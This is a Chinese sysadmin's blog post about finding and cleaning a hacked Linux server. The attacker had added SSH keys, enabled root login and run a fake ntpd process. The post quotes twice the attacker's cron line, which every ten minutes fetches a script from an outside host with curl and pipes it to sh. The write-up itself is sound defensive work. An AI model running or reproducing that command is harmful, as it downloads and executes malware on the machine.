一天发现服务器很卡,还有一些服务莫名的挂掉了,ssh不能通过key登陆,需要密码。感觉有问题,进入系统,查看定时任务发现一个可以的plan。*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh。于是浏览器输入该网址的到了一个脚本。而后开启了定点清除任务。


1.查看.ssh目录内容,检查一下自己的key。如图多了几个文件。可以打开看看

    

    wKioL1eYP-2yRN6XAACtfl4ASeM008.png-wh_50

查看一下计划任务。


wKioL1eYQFGR9fpsAAAbfesKqsU099.png-wh_50

*/10 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh


2.打开crontab 发现一个uri,用浏览器打开看看,是一个脚本,下载下来看看先。



    wKiom1eYQTWSgC48AAC1WArTgYI401.png-wh_50

3.有了这个脚本就容易多了,先看看***都干了什么,然后照着还原回去就行了。看图

    可以看到,他把自己的key加进来,并在ssh的配置文件里修改指向了自己key文件,

    并允许root用户登陆,安装了一个不知道的什么东东,并冒充ntpd启动了。


    wKioL1eYQdGBY4zcAAImAq5nzfk756.png-wh_50


4.如图,该删的删,


    wKiom1eYQ2fh8i9CAAFu-lcxSpc751.png-wh_50


5.查看进程,发现了一个冒充时间服务器的ntp进程,,停掉,顺便也把启动脚本也干掉


    wKioL1eYRHPiCw_1AAA_kS9-R8k303.png-wh_50


    wKioL1eYRIijIkggAAHdNoEhFAM301.png-wh_50


    wKiom1eYRKCB4RxxAAE07SD9kfI474.png-wh_50

就是一个启动脚本居然还有日志,做的跟真的是的??????,有兴趣可以打开看看。


wKiom1eYRNizQDMAAABj9J6AxNU310.png-wh_50


先停掉再说


wKiom1eYRSTw5mKsAAJDL1RoROY034.png-wh_50


6.主进程也得干掉,这是最重要的,干掉后服务器瞬间恢复了,反应和以前一样块了,


    

wKiom1eYRdDzSKq4AAIi02B30PQ467.png-wh_50



wKioL1eYRdKhx0adAAR8_I24F7Q703.png-wh_50


7.最后防火墙一定要开啊。


    wKioL1eYRg_DIg-nAACtKdzledw752.png-wh_50


有什么漏掉的欢迎大家留言指教